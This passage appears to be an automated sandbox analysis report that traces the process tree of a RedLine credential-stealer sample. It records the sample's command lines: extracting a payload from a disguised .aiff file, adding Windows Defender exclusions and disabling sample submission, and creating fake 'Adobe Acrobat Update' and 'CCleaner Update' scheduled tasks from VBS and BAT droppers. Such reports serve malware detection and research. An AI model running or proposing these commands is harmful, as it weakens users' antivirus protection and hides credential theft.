Commandline:	findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Imagebase:	0x820000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:18:59
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
Wow64 process (32bit):	true
Commandline:	Rifiutare.exe.com D
Imagebase:	0xc30000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:18:59
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Imagebase:	0x820000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:18:59
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
Imagebase:	0xc30000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:18:59
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
Wow64 process (32bit):	true
Commandline:	Uno.exe.com f
Imagebase:	0xa00000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:18:59
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Imagebase:	0x820000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:19:00
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
Imagebase:	0xa00000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:19:00
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
Wow64 process (32bit):	true
Commandline:	Inebriato.exe.com R
Imagebase:	0x7ff7699e0000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:19:00
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 30
Imagebase:	0x580000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:19:00
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
Imagebase:	0x5a0000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:19:20
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Imagebase:	0x4a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	02:19:36
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Imagebase:	0x8d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:19:43
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Imagebase:	0x7b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	02:20:29
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:20:29
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:20:29
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
Imagebase:	0xd40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:20:32
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:20:32
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:20:32
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
Imagebase:	0xd40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	02:20:34
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:20:34
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:20:34
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff6ec4b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:20:37
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	02:20:37
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	02:20:37
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
Imagebase:	0xd40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	02:20:39
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	02:20:39
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	02:20:39
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
Imagebase:	0x930000
File size:	144'896 bytes
MD5 hash:	CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	02:20:40
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	02:20:40
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	02:20:40
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Imagebase:	0x930000
File size:	144'896 bytes
MD5 hash:	CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	02:20:41
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	02:20:41
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	02:20:41
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
Imagebase:	0xc50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	02:20:41
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	02:20:41
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	02:20:41
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Imagebase:	0x930000
File size:	144'896 bytes
MD5 hash:	CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	02:20:42
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	02:20:42
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	02:20:42
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
Imagebase:	0xc50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	02:20:43
Start date:	27/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat"
Imagebase:	0x7ff79da90000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	02:20:43
Start date:	27/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs"
Imagebase:	0x7ff79da90000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	02:20:43
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	02:20:43
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	02:20:43
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	02:20:43
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic group where sid="S-1-5-32-544" get name /value
Imagebase:	0x7b0000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	02:20:45
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
Imagebase:	0x7ff7c9e40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	02:20:45
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	59
Start time:	02:20:45
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
Imagebase:	0x7ff7c9e40000
File size:	289'792 bytes
